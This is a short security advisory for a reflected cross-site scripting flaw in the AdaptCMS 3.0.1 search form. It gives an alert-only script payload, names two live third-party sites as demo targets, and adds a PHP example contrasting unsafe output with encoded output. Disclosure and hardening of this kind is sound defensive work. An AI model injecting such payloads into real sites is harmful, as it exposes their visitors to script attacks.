AdaptCMS version 3.0.1 suffers from a cross site scripting vulnerability.
AdaptCMS 3.0.1 Cross Site Scripting Vulnerability
Author : syst3m_f4ult
Homepage : http://www.adaptcms.com/
Vendor : Adapt CMS
Version : 3.0.1 (probably all versions)
Tested on : ubuntu 12.04
Date : 2013-10-11
-----------------------------------------------------------------------
I. POC & Exploit
-----------------------------------------------------------------------
The following page is vulnerable to XSS (Method: POST):
http://localhost/search [data[Search][q] parameter]
Insert the following code inside the search box and hit Enter
<script>alert('syst3m_f4ult')</script>
Demo:
http://www.solitudeisbliss.com/search/
http://www.insanevisions.com/search/
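
The fix for this class of bug is to encode the search term at the point of output. The following is an added example, not AdaptCMS source code: the function names, the 200-character cap and the assumption that the term is reflected into HTML text and a quoted attribute are hypothetical, and it needs the mbstring extension.

```php
<?php
// Added illustration; not AdaptCMS code. All function names are hypothetical.

/** Pull data[Search][q] out of the POST body as a bounded UTF-8 string. */
function search_query(array $post): string
{
    $q = $post['data']['Search']['q'] ?? '';
    // data[Search][q][]=x makes PHP deliver an array; treat it as empty.
    if (!is_string($q)) {
        return '';
    }
    // Reject invalid UTF-8 and cap the length (200 is an arbitrary choice).
    if (!mb_check_encoding($q, 'UTF-8')) {
        return '';
    }
    return mb_substr(trim($q), 0, 200, 'UTF-8');
}

/** Encode for HTML text and quoted-attribute contexts. */
function e(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/** Vulnerable form: the term is concatenated into the page as markup. */
function render_unsafe(array $post): string
{
    $q = $post['data']['Search']['q'] ?? '';
    return '<h2>Results for ' . $q . '</h2>';
}

/** Hardened form: validated term, encoded where it is written out. */
function render_safe(array $post): string
{
    $q = e(search_query($post));
    return '<h2>Results for ' . $q . '</h2>'
         . '<input type="text" name="data[Search][q]" value="' . $q . '">';
}

// Constructed input: the string from this advisory, as PHP parses the POST body.
$post = ['data' => ['Search' => ['q' => "<script>alert('syst3m_f4ult')</script>"]]];
echo render_unsafe($post), "\n"; // term reaches the browser as a script element
echo render_safe($post), "\n";   // term is shown as inert text
```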